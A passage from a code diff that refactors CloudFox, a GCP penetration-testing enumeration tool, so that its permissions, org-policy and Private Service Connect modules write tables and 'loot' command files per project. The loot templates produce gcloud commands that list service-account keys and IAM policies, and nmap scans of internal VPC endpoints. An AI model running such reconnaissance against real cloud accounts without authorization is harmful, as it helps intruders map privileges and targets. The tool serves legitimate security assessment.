strings.Join(policy.DeniedValues, ", ")) } - m.LootMap["orgpolicies-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "\n# Describe this policy:\n"+ "gcloud org-policies describe %s --project=%s\n\n"+ "# Get effective policy (includes inheritance):\n"+ @@ -153,8 +168,15 @@ func (m *OrgPoliciesModule) addPolicyToLoot(policy orgpolicyservice.OrgPolicyInf } func (m *OrgPoliciesModule) writeOutput(ctx context.Context, logger internal.Logger) { - // Main policies table - header := []string{ + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *OrgPoliciesModule) getHeader() []string { + return []string{ "Project Name", "Project ID", "Constraint", @@ -166,9 +188,11 @@ func (m *OrgPoliciesModule) writeOutput(ctx context.Context, logger internal.Log "Allowed Values", "Denied Values", } +} +func (m *OrgPoliciesModule) policiesToTableBody(policies []orgpolicyservice.OrgPolicyInfo) [][]string { var body [][]string - for _, policy := range m.Policies { + for _, policy := range policies { description := policy.Description if description == "" { description = "-" @@ -197,21 +221,69 @@ func (m *OrgPoliciesModule) writeOutput(ctx context.Context, logger internal.Log deniedValues, }) } + return body +} - // Collect loot files - var lootFiles []internal.LootFile - for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { - lootFiles = append(lootFiles, *loot) +func (m *OrgPoliciesModule) buildTablesForProject(projectID string) []internal.TableFile { + var tableFiles []internal.TableFile + if policies, ok := m.ProjectPolicies[projectID]; ok && len(policies) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "orgpolicies", + Header: m.getHeader(), + Body: m.policiesToTableBody(policies), + }) + } + return tableFiles +} + +func (m *OrgPoliciesModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + for projectID := range m.ProjectPolicies { + tableFiles := m.buildTablesForProject(projectID) + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } } + + outputData.ProjectLevelData[projectID] = OrgPoliciesOutput{Table: tableFiles, Loot: lootFiles} } - tables := []internal.TableFile{ - { + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_ORGPOLICIES_MODULE_NAME) + } +} + +func (m *OrgPoliciesModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allPolicies := m.getAllPolicies() + + var tables []internal.TableFile + if len(allPolicies) > 0 { + tables = append(tables, internal.TableFile{ Name: "orgpolicies", - Header: header, - Body: body, - }, + Header: m.getHeader(), + Body: m.policiesToTableBody(allPolicies), + }) + } + + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } } output := OrgPoliciesOutput{Table: tables, Loot: lootFiles} diff --git a/gcp/commands/permissions.go b/gcp/commands/permissions.go index c3ec89b0..018d3269 100644 --- a/gcp/commands/permissions.go +++ b/gcp/commands/permissions.go @@ -93,13 +93,14 @@ type ExplodedPermission struct { type PermissionsModule struct { gcpinternal.BaseGCPModule - // Module-specific fields - ExplodedPerms []ExplodedPermission - EntityPermissions []IAMService.EntityPermissions - GroupInfos []IAMService.GroupInfo - OrgBindings []IAMService.PolicyBinding - FolderBindings map[string][]IAMService.PolicyBinding - LootMap map[string]*internal.LootFile + // Module-specific fields - now per-project for hierarchical output + ProjectPerms map[string][]ExplodedPermission // projectID -> permissions + OrgPerms map[string][]ExplodedPermission // orgID -> org-level permissions + EntityPermissions []IAMService.EntityPermissions // Legacy: aggregated for stats + GroupInfos []IAMService.GroupInfo // Legacy: aggregated for stats + OrgBindings []IAMService.PolicyBinding // org-level bindings + FolderBindings map[string][]IAMService.PolicyBinding // folder-level bindings + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files mu sync.Mutex // Organization info for output path @@ -129,17 +130,17 @@ func runGCPPermissionsCommand(cmd *cobra.Command, args []string) { module := &PermissionsModule{ BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), - ExplodedPerms: []ExplodedPermission{}, + ProjectPerms: make(map[string][]ExplodedPermission), + OrgPerms: make(map[string][]ExplodedPermission), EntityPermissions: []IAMService.EntityPermissions{}, GroupInfos: []IAMService.GroupInfo{}, OrgBindings: []IAMService.PolicyBinding{}, FolderBindings: make(map[string][]IAMService.PolicyBinding), - LootMap: make(map[string]*internal.LootFile), + LootMap: make(map[string]map[string]*internal.LootFile), OrgIDs: []string{}, OrgNames: make(map[string]string), } - module.initializeLootFiles() module.Execute(cmdCtx.Ctx, cmdCtx.Logger) } @@ -156,7 +157,9 @@ func (m *PermissionsModule) Execute(ctx context.Context, logger internal.Logger) // Run project enumeration with concurrency m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_PERMISSIONS_MODULE_NAME, m.processProject) - if len(m.ExplodedPerms) == 0 { + // Get all permissions for stats + allPerms := m.getAllExplodedPerms() + if len(allPerms) == 0 { logger.InfoM("No permissions found", globals.GCP_PERMISSIONS_MODULE_NAME) return } @@ -168,7 +171,7 @@ func (m *PermissionsModule) Execute(ctx context.Context, logger internal.Logger) crossProjectCount := 0 highPrivCount := 0 - for _, ep := range m.ExplodedPerms { + for _, ep := range allPerms { uniqueEntities[ep.Entity] = true uniquePerms[ep.Permission] = true if ep.IsInherited { @@ -183,7 +186,7 @@ func (m *PermissionsModule) Execute(ctx context.Context, logger internal.Logger) } logger.SuccessM(fmt.Sprintf("Exploded %d total permission entries for %d entities", - len(m.ExplodedPerms), len(uniqueEntities)), globals.GCP_PERMISSIONS_MODULE_NAME) + len(allPerms), len(uniqueEntities)), globals.GCP_PERMISSIONS_MODULE_NAME) logger.InfoM(fmt.Sprintf("Unique permissions: %d | Inherited: %d | Cross-project: %d | High-privilege: %d", len(uniquePerms), inheritedCount, crossProjectCount, highPrivCount), globals.GCP_PERMISSIONS_MODULE_NAME) @@ -205,10 +208,33 @@ func (m *PermissionsModule) Execute(ctx context.Context, logger internal.Logger) m.writeOutput(ctx, logger) } +// getAllExplodedPerms returns all permissions from all scopes (for statistics) +func (m *PermissionsModule) getAllExplodedPerms() []ExplodedPermission { + var all []ExplodedPermission + for _, perms := range m.OrgPerms { + all = append(all, perms...) + } + for _, perms := range m.ProjectPerms { + all = append(all, perms...) + } + return all +} + // enumerateOrganizationBindings tries to get organization-level IAM bindings func (m *PermissionsModule) enumerateOrganizationBindings(ctx context.Context, logger internal.Logger) { orgsSvc := orgsservice.New() + // Get org display names mapping (orgID -> displayName) + orgDisplayNames := make(map[string]string) + orgs, err := orgsSvc.SearchOrganizations() + if err == nil { + for _, org := range orgs { + // org.Name is "organizations/ORGID", extract just the ID + orgID := strings.TrimPrefix(org.Name, "organizations/") + orgDisplayNames[orgID] = org.DisplayName + } + } + if len(m.ProjectIDs) > 0 { iamSvc := IAMService.New() @@ -227,7 +253,12 @@ func (m *PermissionsModule) enumerateOrganizationBindings(ctx context.Context, l // Track org IDs if !contains(m.OrgIDs, binding.ResourceID) { m.OrgIDs = append(m.OrgIDs, binding.ResourceID) - m.OrgNames[binding.ResourceID] = binding.ResourceID // Use ID as name for now + // Use display name if available, otherwise fall back to ID + if displayName, ok := orgDisplayNames[binding.ResourceID]; ok && displayName != "" { + m.OrgNames[binding.ResourceID] = displayName + } else { + m.OrgNames[binding.ResourceID] = binding.ResourceID + } } m.mu.Unlock() } else if binding.ResourceType == "folder" { @@ -249,8 +280,6 @@ func (m *PermissionsModule) enumerateOrganizationBindings(ctx context.Context, l logger.InfoM(fmt.Sprintf("Found %d folder-level IAM binding(s) across %d folder(s)", totalFolderBindings, len(m.FolderBindings)), globals.GCP_PERMISSIONS_MODULE_NAME) } } - - _ = orgsSvc } func contains(slice []string, item string) bool { @@ -279,7 +308,9 @@ func (m *PermissionsModule) processProject(ctx context.Context, projectID string return } - var explodedPerms []ExplodedPermission + var projectPerms []ExplodedPermission + var orgPerms []ExplodedPermission + for _, ep := range entityPerms { for _, perm := range ep.Permissions { isHighPriv := isHighPrivilegePermission(perm.Permission) @@ -324,23 +355,43 @@ func (m *PermissionsModule) processProject(ctx context.Context, projectID string } } - explodedPerms = append(explodedPerms, exploded) + // Route to appropriate scope: org-level permissions go to org, rest to project + if perm.ResourceType == "organization" { + orgPerms = append(orgPerms, exploded) + } else { + projectPerms = append(projectPerms, exploded) + } } } m.mu.Lock() - m.ExplodedPerms = append(m.ExplodedPerms, explodedPerms...) + // Store per-project permissions + m.ProjectPerms[projectID] = append(m.ProjectPerms[projectID], projectPerms...) + + // Store org-level permissions (keyed by org ID) + for _, ep := range orgPerms { + m.OrgPerms[ep.ResourceScopeID] = append(m.OrgPerms[ep.ResourceScopeID], ep) + } + + // Legacy aggregated fields for stats m.EntityPermissions = append(m.EntityPermissions, entityPerms...) m.GroupInfos = append(m.GroupInfos, groupInfos...) - // Generate loot + // Generate loot per-project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["permissions-commands"] = &internal.LootFile{ + Name: "permissions-commands", + Contents: "# GCP Permissions Commands\n# Generated by CloudFox\n\n", + } + } for _, ep := range entityPerms { - m.addEntityToLoot(ep) + m.addEntityToLoot(projectID, ep) } m.mu.Unlock() if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.InfoM(fmt.Sprintf("Exploded %d permission entries in project %s", len(explodedPerms), projectID), globals.GCP_PERMISSIONS_MODULE_NAME) + logger.InfoM(fmt.Sprintf("Exploded %d permission entries in project %s", len(projectPerms), projectID), globals.GCP_PERMISSIONS_MODULE_NAME) } } @@ -378,14 +429,7 @@ func parseConditionTitle(condition string) string { // ------------------------------ // Loot File Management // ------------------------------ -func (m *PermissionsModule) initializeLootFiles() { - m.LootMap["permissions-commands"] = &internal.LootFile{ - Name: "permissions-commands", - Contents: "# GCP Permissions Commands\n# Generated by CloudFox\n\n", - } -} - -func (m *PermissionsModule) addEntityToLoot(ep IAMService.EntityPermissions) { +func (m *PermissionsModule) addEntityToLoot(projectID string, ep IAMService.EntityPermissions) { // Only add service accounts with high-privilege permissions hasHighPriv := false var highPrivPerms []string @@ -398,8 +442,13 @@ func (m *PermissionsModule) addEntityToLoot(ep IAMService.EntityPermissions) { } if ep.EntityType == "ServiceAccount" { + lootFile := m.LootMap[projectID]["permissions-commands"] + if lootFile == nil { + return + } + if hasHighPriv { - m.LootMap["permissions-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "# Service Account: %s [HIGH PRIVILEGE]\n"+ "# High-privilege permissions: %s\n"+ "# Roles: %s\n", @@ -408,7 +457,7 @@ func (m *PermissionsModule) addEntityToLoot(ep IAMService.EntityPermissions) { strings.Join(ep.Roles, ", "), ) } else { - m.LootMap["permissions-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "# Service Account: %s\n"+ "# Roles: %s\n", ep.Email, @@ -416,7 +465,7 @@ func (m *PermissionsModule) addEntityToLoot(ep IAMService.EntityPermissions) { ) } - m.LootMap["permissions-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "gcloud iam service-accounts describe %s --project=%s\n"+ "gcloud iam service-accounts keys list --iam-account=%s --project=%s\n"+ "gcloud iam service-accounts get-iam-policy %s --project=%s\n"+ @@ -578,74 +627,122 @@ func formatPermissionCondition(hasCondition bool, condition, conditionTitle stri // Output Generation // ------------------------------ func (m *PermissionsModule) writeOutput(ctx context.Context, logger internal.Logger) { - // Single unified table with all permissions - header := []string{ - "Scope Type", - "Scope ID", - "Scope Name", - "Entity Type", - "Identity", - "Permission", - "Role", - "Custom Role", - "Inherited", - "Inherited From", - "Condition", - "Cross-Project", - "High Privilege", - "Federated", + // Log findings first + allPerms := m.getAllExplodedPerms() + highPrivCount := 0 + crossProjectCount := 0 + for _, ep := range allPerms { + if ep.IsHighPrivilege { + highPrivCount++ + } + if ep.IsCrossProject { + crossProjectCount++ + } } - var body [][]string - for _, ep := range m.ExplodedPerms { - isCustom := "No" - if ep.RoleType == "custom" || strings.HasPrefix(ep.Role, "projects/") || strings.HasPrefix(ep.Role, "organizations/") { - isCustom = "Yes" - } + if highPrivCount > 0 { + logger.InfoM(fmt.Sprintf("[FINDING] Found %d high-privilege permission entries!", highPrivCount), globals.GCP_PERMISSIONS_MODULE_NAME) + } + if crossProjectCount > 0 { + logger.InfoM(fmt.Sprintf("[FINDING] Found %d cross-project permission entries!", crossProjectCount), globals.GCP_PERMISSIONS_MODULE_NAME) + } - inherited := "No" - if ep.IsInherited { - inherited = "Yes" - } + // Decide between hierarchical and flat output + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} - inheritedFrom := "-" - if ep.IsInherited && ep.InheritedFrom != "" { - inheritedFrom = ep.InheritedFrom - } +// writeHierarchicalOutput writes output to per-project directories +func (m *PermissionsModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + header := m.getTableHeader() - condition := formatPermissionCondition(ep.HasCondition, ep.Condition, ep.ConditionTitle) + // Build hierarchical output data + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } - crossProject := "No" - if ep.IsCrossProject { - crossProject = fmt.Sprintf("Yes (from %s)", ep.SourceProject) - } + // Determine org ID - prefer discovered orgs, fall back to hierarchy + orgID := "" + if len(m.OrgIDs) > 0 { + orgID = m.OrgIDs[0] + } else if m.Hierarchy != nil && len(m.Hierarchy.Organizations) > 0 { + orgID = m.Hierarchy.Organizations[0].ID + } - highPriv := "No" - if ep.IsHighPrivilege { - highPriv = "Yes" + // Collect all loot files + var allLootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + allLootFiles = append(allLootFiles, *loot) + } } + } - // Check for federated identity - federated := formatPermFederatedInfo(parsePermFederatedIdentity(ep.EntityEmail)) + if orgID != "" { + // DUAL OUTPUT: Complete aggregated output at org level + allPerms := m.getAllExplodedPerms() + body := m.permsToTableBody(allPerms) + tables := []internal.TableFile{{ + Name: "permissions", + Header: header, + Body: body, + }} + outputData.OrgLevelData[orgID] = PermissionsOutput{Table: tables, Loot: allLootFiles} - body = append(body, []string{ - ep.ResourceScopeType, - ep.ResourceScopeID, - ep.ResourceScopeName, - ep.EntityType, - ep.EntityEmail, - ep.Permission, - ep.Role, - isCustom, - inherited, - inheritedFrom, - condition, - crossProject, - highPriv, - federated, - }) + // DUAL OUTPUT: Filtered per-project output + for projectID, perms := range m.ProjectPerms { + if len(perms) == 0 { + continue + } + body := m.permsToTableBody(perms) + tables := []internal.TableFile{{ + Name: "permissions", + Header: header, + Body: body, + }} + outputData.ProjectLevelData[projectID] = PermissionsOutput{Table: tables, Loot: nil} + } + } else if len(m.ProjectIDs) > 0 { + // FALLBACK: No org discovered, output complete data to first project + allPerms := m.getAllExplodedPerms() + body := m.permsToTableBody(allPerms) + tables := []internal.TableFile{{ + Name: "permissions", + Header: header, + Body: body, + }} + outputData.ProjectLevelData[m.ProjectIDs[0]] = PermissionsOutput{Table: tables, Loot: allLootFiles} } + // Create path builder using the module's hierarchy + pathBuilder := m.BuildPathBuilder() + + // Write using hierarchical output + err := internal.HandleHierarchicalOutputSmart( + "gcp", + m.Format, + m.Verbosity, + m.WrapTable, + pathBuilder, + outputData, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_PERMISSIONS_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// writeFlatOutput writes all output to a single directory (legacy mode) +func (m *PermissionsModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + header := m.getTableHeader() + allPerms := m.getAllExplodedPerms() + body := m.permsToTableBody(allPerms) + // Sort by scope type (org first, then folder, then project), then entity, then permission scopeOrder := map[string]int{"organization": 0, "folder": 1, "project": 2} sort.Slice(body, func(i, j int) bool { @@ -658,40 +755,21 @@ func (m *PermissionsModule) writeOutput(ctx context.Context, logger internal.Log return body[i][5] < body[j][5] }) - // Collect loot files + // Collect all loot files var lootFiles []internal.LootFile - for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { - lootFiles = append(lootFiles, *loot) - } - } - - tables := []internal.TableFile{ - { - Name: "permissions", - Header: header, - Body: body, - }, - } - - // Log findings - highPrivCount := 0 - crossProjectCount := 0 - for _, ep := range m.ExplodedPerms { - if ep.IsHighPrivilege { - highPrivCount++ - } - if ep.IsCrossProject { - crossProjectCount++ + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } } } - if highPrivCount > 0 { - logger.InfoM(fmt.Sprintf("[FINDING] Found %d high-privilege permission entries!", highPrivCount), globals.GCP_PERMISSIONS_MODULE_NAME) - } - if crossProjectCount > 0 { - logger.InfoM(fmt.Sprintf("[FINDING] Found %d cross-project permission entries!", crossProjectCount), globals.GCP_PERMISSIONS_MODULE_NAME) - } + tables := []internal.TableFile{{ + Name: "permissions", + Header: header, + Body: body, + }} output := PermissionsOutput{ Table: tables, @@ -738,3 +816,77 @@ func (m *PermissionsModule) writeOutput(ctx context.Context, logger internal.Log m.CommandCounter.Error++ } } + +// getTableHeader returns the permissions table header +func (m *PermissionsModule) getTableHeader() []string { + return []string{ + "Scope Type", + "Scope ID", + "Scope Name", + "Entity Type", + "Identity", + "Permission", + "Role", + "Custom Role", + "Inherited", + "Inherited From", + "Condition", + "Cross-Project", + "High Privilege", + "Federated", + } +} + +// permsToTableBody converts permissions to table body rows +func (m *PermissionsModule) permsToTableBody(perms []ExplodedPermission) [][]string { + var body [][]string + for _, ep := range perms { + isCustom := "No" + if ep.RoleType == "custom" || strings.HasPrefix(ep.Role, "projects/") || strings.HasPrefix(ep.Role, "organizations/") { + isCustom = "Yes" + } + + inherited := "No" + if ep.IsInherited { + inherited = "Yes" + } + + inheritedFrom := "-" + if ep.IsInherited && ep.InheritedFrom != "" { + inheritedFrom = ep.InheritedFrom + } + + condition := formatPermissionCondition(ep.HasCondition, ep.Condition, ep.ConditionTitle) + + crossProject := "No" + if ep.IsCrossProject { + crossProject = fmt.Sprintf("Yes (from %s)", ep.SourceProject) + } + + highPriv := "No" + if ep.IsHighPrivilege { + highPriv = "Yes" + } + + // Check for federated identity + federated := formatPermFederatedInfo(parsePermFederatedIdentity(ep.EntityEmail)) + + body = append(body, []string{ + ep.ResourceScopeType, + ep.ResourceScopeID, + ep.ResourceScopeName, + ep.EntityType, + ep.EntityEmail, + ep.Permission, + ep.Role, + isCustom, + inherited, + inheritedFrom, + condition, + crossProject, + highPriv, + federated, + }) + } + return body +} diff --git a/gcp/commands/privateserviceconnect.go b/gcp/commands/privateserviceconnect.go index 774a742d..31cc61f7 100644 --- a/gcp/commands/privateserviceconnect.go +++ b/gcp/commands/privateserviceconnect.go @@ -44,11 +44,11 @@ Output includes nmap commands for scanning internal endpoints.`, type PrivateServiceConnectModule struct { gcpinternal.BaseGCPModule - PSCEndpoints []networkendpointsservice.PrivateServiceConnectEndpoint - PrivateConnections []networkendpointsservice.PrivateConnection - ServiceAttachments []networkendpointsservice.ServiceAttachment - LootMap map[string]*internal.LootFile - mu sync.Mutex + ProjectPSCEndpoints map[string][]networkendpointsservice.PrivateServiceConnectEndpoint // projectID -> endpoints + ProjectPrivateConnections map[string][]networkendpointsservice.PrivateConnection // projectID -> connections + ProjectServiceAttachments map[string][]networkendpointsservice.ServiceAttachment // projectID -> attachments + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + mu sync.Mutex } // ------------------------------ @@ -72,14 +72,13 @@ func runGCPPrivateServiceConnectCommand(cmd *cobra.Command, args []string) { } module := &PrivateServiceConnectModule{ - BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), - PSCEndpoints: []networkendpointsservice.PrivateServiceConnectEndpoint{}, - PrivateConnections: []networkendpointsservice.PrivateConnection{}, - ServiceAttachments: []networkendpointsservice.ServiceAttachment{}, - LootMap: make(map[string]*internal.LootFile), + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectPSCEndpoints: make(map[string][]networkendpointsservice.PrivateServiceConnectEndpoint), + ProjectPrivateConnections: make(map[string][]networkendpointsservice.PrivateConnection), + ProjectServiceAttachments: make(map[string][]networkendpointsservice.ServiceAttachment), + LootMap: make(map[string]map[string]*internal.LootFile), } - module.initializeLootFiles() module.Execute(cmdCtx.Ctx, cmdCtx.Logger) } @@ -89,7 +88,11 @@ func runGCPPrivateServiceConnectCommand(cmd *cobra.Command, args []string) { func (m *PrivateServiceConnectModule) Execute(ctx context.Context, logger internal.Logger) { m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, "private-service-connect", m.processProject) - totalFindings := len(m.PSCEndpoints) + len(m.PrivateConnections) + len(m.ServiceAttachments) + allEndpoints := m.getAllPSCEndpoints() + allConnections := m.getAllPrivateConnections() + allAttachments := m.getAllServiceAttachments() + + totalFindings := len(allEndpoints) + len(allConnections) + len(allAttachments) if totalFindings == 0 { logger.InfoM("No private service connect endpoints found", "private-service-connect") @@ -97,11 +100,11 @@ func (m *PrivateServiceConnectModule) Execute(ctx context.Context, logger intern } logger.SuccessM(fmt.Sprintf("Found %d PSC endpoint(s), %d private connection(s), %d service attachment(s)", - len(m.PSCEndpoints), len(m.PrivateConnections), len(m.ServiceAttachments)), "private-service-connect") + len(allEndpoints), len(allConnections), len(allAttachments)), "private-service-connect") // Count high-risk findings autoAcceptCount := 0 - for _, sa := range m.ServiceAttachments { + for _, sa := range allAttachments { if sa.ConnectionPreference == "ACCEPT_AUTOMATIC" { autoAcceptCount++ } @@ -113,6 +116,30 @@ func (m *PrivateServiceConnectModule) Execute(ctx context.Context, logger intern m.writeOutput(ctx, logger) } +func (m *PrivateServiceConnectModule) getAllPSCEndpoints() []networkendpointsservice.PrivateServiceConnectEndpoint { + var all []networkendpointsservice.PrivateServiceConnectEndpoint + for _, endpoints := range m.ProjectPSCEndpoints { + all = append(all, endpoints...) + } + return all +} + +func (m *PrivateServiceConnectModule) getAllPrivateConnections() []networkendpointsservice.PrivateConnection { + var all []networkendpointsservice.PrivateConnection + for _, conns := range m.ProjectPrivateConnections { + all = append(all, conns...) + } + return all +} + +func (m *PrivateServiceConnectModule) getAllServiceAttachments() []networkendpointsservice.ServiceAttachment { + var all []networkendpointsservice.ServiceAttachment + for _, attachments := range m.ProjectServiceAttachments { + all = append(all, attachments...) + } + return all +} + // ------------------------------ // Project Processor // ------------------------------ @@ -121,6 +148,20 @@ func (m *PrivateServiceConnectModule) processProject(ctx context.Context, projec logger.InfoM(fmt.Sprintf("Checking private service connect in project: %s", projectID), "private-service-connect") } + m.mu.Lock() + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["private-service-connect-commands"] = &internal.LootFile{ + Name: "private-service-connect-commands", + Contents: "# Private Service Connect Commands\n" + + "# Generated by CloudFox\n" + + "# WARNING: Only use with proper authorization\n" + + "# NOTE: These are internal IPs - you must be on the VPC network to reach them\n\n", + } + } + m.mu.Unlock() + svc := networkendpointsservice.New() // Get PSC endpoints @@ -148,18 +189,18 @@ func (m *PrivateServiceConnectModule) processProject(ctx context.Context, projec } m.mu.Lock() - m.PSCEndpoints = append(m.PSCEndpoints, pscEndpoints...) - m.PrivateConnections = append(m.PrivateConnections, privateConns...) - m.ServiceAttachments = append(m.ServiceAttachments, attachments...) + m.ProjectPSCEndpoints[projectID] = append(m.ProjectPSCEndpoints[projectID], pscEndpoints...) + m.ProjectPrivateConnections[projectID] = append(m.ProjectPrivateConnections[projectID], privateConns...) + m.ProjectServiceAttachments[projectID] = append(m.ProjectServiceAttachments[projectID], attachments...) for _, endpoint := range pscEndpoints { - m.addPSCEndpointToLoot(endpoint) + m.addPSCEndpointToLoot(projectID, endpoint) } for _, conn := range privateConns { - m.addPrivateConnectionToLoot(conn) + m.addPrivateConnectionToLoot(projectID, conn) } for _, attachment := range attachments { - m.addServiceAttachmentToLoot(attachment) + m.addServiceAttachmentToLoot(projectID, attachment) } m.mu.Unlock() } @@ -167,18 +208,12 @@ func (m *PrivateServiceConnectModule) processProject(ctx context.Context, projec // ------------------------------ // Loot File Management // ------------------------------ -func (m *PrivateServiceConnectModule) initializeLootFiles() { - m.LootMap["private-service-connect-commands"] = &internal.LootFile{ - Name: "private-service-connect-commands", - Contents: "# Private Service Connect Commands\n" + - "# Generated by CloudFox\n" + - "# WARNING: Only use with proper authorization\n" + - "# NOTE: These are internal IPs - you must be on the VPC network to reach them\n\n", +func (m *PrivateServiceConnectModule) addPSCEndpointToLoot(projectID string, endpoint networkendpointsservice.PrivateServiceConnectEndpoint) { + lootFile := m.LootMap[projectID]["private-service-connect-commands"] + if lootFile == nil { + return } -} - -func (m *PrivateServiceConnectModule) addPSCEndpointToLoot(endpoint networkendpointsservice.PrivateServiceConnectEndpoint) { - m.LootMap["private-service-connect-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "## PSC Endpoint: %s (Project: %s, Region: %s)\n"+ "# Network: %s, Subnet: %s\n"+ "# Target Type: %s, Target: %s\n"+ @@ -193,7 +228,7 @@ func (m *PrivateServiceConnectModule) addPSCEndpointToLoot(endpoint networkendpo ) if endpoint.IPAddress != "" { - m.LootMap["private-service-connect-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "# Scan internal endpoint (from within VPC):\n"+ "nmap -sV -Pn %s\n\n", endpoint.IPAddress, @@ -201,7 +236,11 @@ func (m *PrivateServiceConnectModule) addPSCEndpointToLoot(endpoint networkendpo } } -func (m *PrivateServiceConnectModule) addPrivateConnectionToLoot(conn networkendpointsservice.PrivateConnection) { +func (m *PrivateServiceConnectModule) addPrivateConnectionToLoot(projectID string, conn networkendpointsservice.PrivateConnection) { + lootFile := m.LootMap[projectID]["private-service-connect-commands"] + if lootFile == nil { + return + } reservedRanges := "-" if len(conn.ReservedRanges) > 0 { reservedRanges = strings.Join(conn.ReservedRanges, ", ") @@ -211,7 +250,7 @@ func (m *PrivateServiceConnectModule) addPrivateConnectionToLoot(conn networkend accessibleServices = strings.Join(conn.AccessibleServices, ", ") } - m.LootMap["private-service-connect-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "## Private Connection: %s (Project: %s)\n"+ "# Network: %s, Service: %s\n"+ "# Peering: %s\n"+ @@ -229,7 +268,7 @@ func (m *PrivateServiceConnectModule) addPrivateConnectionToLoot(conn networkend // Add nmap commands for each reserved range for _, ipRange := range conn.ReservedRanges { - m.LootMap["private-service-connect-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "# Scan private connection range (from within VPC):\n"+ "nmap -sV -Pn %s\n\n", ipRange, @@ -237,13 +276,17 @@ func (m *PrivateServiceConnectModule) addPrivateConnectionToLoot(conn networkend } } -func (m *PrivateServiceConnectModule) addServiceAttachmentToLoot(attachment networkendpointsservice.ServiceAttachment) { +func (m *PrivateServiceConnectModule) addServiceAttachmentToLoot(projectID string, attachment networkendpointsservice.ServiceAttachment) { + lootFile := m.LootMap[projectID]["private-service-connect-commands"] + if lootFile == nil { + return + } natSubnets := "-" if len(attachment.NatSubnets) > 0 { natSubnets = strings.Join(attachment.NatSubnets, ", ") } - m.LootMap["private-service-connect-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "## Service Attachment: %s (Project: %s, Region: %s)\n"+ "# Target Service: %s\n"+ "# Connection Preference: %s\n"+ @@ -257,21 +300,21 @@ func (m *PrivateServiceConnectModule) addServiceAttachmentToLoot(attachment netw ) if len(attachment.ConsumerAcceptLists) > 0 { - m.LootMap["private-service-connect-commands"].Contents += fmt.Sprintf("# Accept List: %s\n", strings.Join(attachment.ConsumerAcceptLists, ", ")) + lootFile.Contents += fmt.Sprintf("# Accept List: %s\n", strings.Join(attachment.ConsumerAcceptLists, ", ")) } if len(attachment.ConsumerRejectLists) > 0 { - m.LootMap["private-service-connect-commands"].Contents += fmt.Sprintf("# Reject List: %s\n", strings.Join(attachment.ConsumerRejectLists, ", ")) + lootFile.Contents += fmt.Sprintf("# Reject List: %s\n", strings.Join(attachment.ConsumerRejectLists, ", ")) } // Add IAM bindings info if len(attachment.IAMBindings) > 0 { - m.LootMap["private-service-connect-commands"].Contents += "# IAM Bindings:\n" + lootFile.Contents += "# IAM Bindings:\n" for _, binding := range attachment.IAMBindings { - m.LootMap["private-service-connect-commands"].Contents += fmt.Sprintf("# %s -> %s\n", binding.Role, binding.Member) + lootFile.Contents += fmt.Sprintf("# %s -> %s\n", binding.Role, binding.Member) } } - m.LootMap["private-service-connect-commands"].Contents += fmt.Sprintf( + lootFile.Contents += 